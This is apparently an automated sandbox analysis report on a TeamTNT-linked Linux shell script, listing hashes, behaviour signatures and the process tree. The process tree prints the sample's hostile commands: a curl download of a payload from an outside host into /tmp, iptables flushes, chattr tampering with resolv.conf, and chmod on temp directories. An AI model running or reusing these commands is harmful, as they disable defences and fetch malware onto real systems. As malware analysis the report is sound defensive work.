Analysis

  • max time kernel
    149s
  • max time network
    31s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhf
    image:debian9-armhf-20240611-en
    kernel:4.9.0-13-armmp-lpae
    locale:en-us
    os:debian-9-armhf
    system
  • submitted
    29-12-2024 23:10

General

  • Target

    SugarLogic_#teamtnt_by_@r3dbU7z/mo.sh

  • Size

    33KB

  • MD5

    dd89ab7314e13989bdcae176a82078ac

  • SHA1

    9ed46a6dde1dc1de4eed8185c1d622a5fc97092c

  • SHA256

    1b72088fc6d780da95465f80ab26ba094d89232ff30a41b1b0113c355cfffa57

  • SHA512

    e56722b308702bec178a1eca47c400af2435b57b190a10307aec0eebdfd4ef04ec6d63302a754b508a62d64668cb7b4edbc596a4e40c409e34b4934265d7db3d

  • SSDEEP

    768:DBxlT2wDGWvWCrDN+FylT4hxXpGdKI3oB6RXrsdrCIZMfXxK2eJ5tLW:qWN+Fyl1dRoGrq9W

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Flushes firewall rules 1 TTPs 2 IoCs

    Flushes/disables firewall rules inside the Linux kernel.

  • Writes DNS configuration 1 TTPs 1 IoCs

    Writes data to DNS resolver config file.

  • Attempts to change immutable files 3 IoCs

    Modifies inode attributes on the filesystem to allow changing of immutable files.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information that indicates whether the system is a virtual machine.

  • Reads CPU attributes 1 TTPs 2 IoCs
  • Process Discovery 1 TTPs 2 IoCs

    Adversaries may try to discover information about running processes.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/SugarLogic_#teamtnt_by_@r3dbU7z/mo.sh
    "/tmp/SugarLogic_#teamtnt_by_@r3dbU7z/mo.sh"
    1⤵
    • Writes DNS configuration
    PID:711
    • /bin/hostname
      hostname
      2⤵
      PID:716
    • /bin/ps
      ps aux
      2⤵
      • Reads CPU attributes
      • Process Discovery
      • Reads runtime system information
      PID:718
    • /bin/grep
      grep -i "[a]liyun"
      2⤵
      PID:719
    • /bin/ps
      ps aux
      2⤵
      • Reads CPU attributes
      • Process Discovery
      • Reads runtime system information
      PID:720
    • /bin/grep
      grep -i "[y]unjing"
      2⤵
      PID:721
    • /sbin/iptables
      iptables -F
      2⤵
      • Flushes firewall rules
      PID:722
    • /usr/bin/chattr
      chattr -ia /etc/resolv.conf
      2⤵
      • Attempts to change immutable files
      PID:727
    • /usr/bin/chattr
      chattr +i /etc/resolv.conf
      2⤵
      • Attempts to change immutable files
      PID:729
    • /usr/bin/chattr
      chattr -ia / /tmp/ /var/ /var/tmp/
      2⤵
      • Attempts to change immutable files
      PID:731
    • /bin/chmod
      chmod 1777 /tmp/ /var/ /var/tmp/
      2⤵
      • File and Directory Permissions Modification
      PID:732
    • /sbin/iptables
      iptables -F
      2⤵
      • Flushes firewall rules
      PID:734
    • /usr/bin/curl
      curl -sLk http://chimaera.cc/bin/KBot/x86_64 -o /tmp/.kube
      2⤵
      • Checks CPU configuration
      PID:736

Network

MITRE ATT&CK Enterprise v15
